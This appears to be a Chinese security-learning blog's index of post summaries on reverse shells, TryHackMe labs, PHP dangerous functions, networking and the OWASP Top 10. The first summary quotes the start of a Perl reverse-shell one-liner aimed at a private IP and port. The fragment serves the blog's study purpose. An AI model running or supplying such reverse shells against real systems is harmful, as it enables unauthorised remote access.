Xia0_0

摘要： https://github.com/security-cheatsheet/reverse-shell-cheatsheet 反向shell作弊表 perl -e 'use Socket; $i="192.168.0.5"; # 目標 IP 地址 $p=4545; # 目標端口 socket(S, 閱讀全文

摘要： PS:我寫的這不是完整的做題wp,而是針對這個靶機做些提煉和總結，完整的wp推薦 目標是拿到普通用戶和root用戶的flag，換句話說，就是拿到相應權限 要點 連接 直接訪問靶機IP，會出現這個 原因是.thm不是個標準域名后綴，一般用于TryHackMe這樣的滲透測試平臺或內部網絡環境。所以直接訪 閱讀全文

摘要： 危險函數 passthru() 直接輸出命令執行的原始結果 system() 執行一個外部程序，并顯示輸出。 shell_exec() 執行一個命令并將整個輸出以字符串返回 dl() 運行時加載 PHP 擴展庫 mail() 郵件發送 putenv() 環境控制 phpinfo.php DOCUME 閱讀全文

摘要： THM THM是個極好的網絡安全學習靶場，但是針對國內的網絡情況和thm官方并沒有對大陸進行相應的網絡優化，故經常無法用自己的虛擬機openvp嗯 連接至靶機，我本人也折騰了老長時間，故寫篇博客梳理下要點。 如遇到問題，建議挨個排查，以kali虛擬機為例 網絡環境： 主機tun+nat（推薦這個） 閱讀全文

摘要： linux Linux背景知識 Linux系統的背景知識，常見版本和特點 🧠 一、Linux 是什么？ Linux 是一個自由開源的類 Unix 操作系統內核，由芬蘭人 Linus Torvalds 于 1991 年發布。 它具有： 🆓 自由開源（源代碼可查看、可修改） ?? 穩定安全（廣泛用于 閱讀全文

摘要： 中間件 中間件基礎 中間件的概念和技術 什么是中間件？ 中間件是一個連接不同程序、系統和服務的“橋梁”，讓它們能夠相互溝通和協作。 中間件的作用？ 連接不同系統：讓不同的應用、服務或數據庫能夠互相交流。 提高效率：幫助多個應用程序并行工作，提高系統的運行效率。 確保安全性：管理用戶權限、加密數據等。 閱讀全文

摘要： 搜索工具 google bing 微信搜索(相當好用) VM 在大多數虛擬機軟件中（比如 VMware、VirtualBox），網絡通常有 三種基本模式： 🌐 1. 橋接模式（Bridged） 就像虛擬機是一臺真正連接到你局域網的獨立電腦。 📡 網絡結構：虛擬機直接橋接到宿主機的網卡上，跟宿主機 閱讀全文

摘要： PHP： php是一個后端語言，Hypertext Preprocessor，即"PHP：超文本預處理器" <?php echo "Hello World!"; ?> 輸出文本的基礎指令：echo 和 print 注釋方式： # 這是單行注釋 // 這也是單行注釋 /* 這是多行注釋 多行注釋 多行 閱讀全文

摘要： 網絡 網絡原理 網絡功能 網絡的概念 網絡是指多個設備（如計算機、服務器、路由器等）通過通信介質（如網線、無線信號）連接在一起，以實現數據交換和資源共享。 網絡拓撲分類 網絡拓撲是指網絡設備如何連接的結構方式，主要分為以下幾種： 總線型（Bus） 所有設備連接到同一條主干線路上 結構簡單，成本低，但 閱讀全文

摘要： OWASP-TOP10,網絡空間中常見的10大類型漏洞 Broken Access Control 訪問控制失效 Cryptographic Failures 加密失效 Injection 注入 用戶控制的輸入被應用程序解釋為實際的命令或參數。 常見的有SQL注入和命令注入 Linux whoami 閱讀全文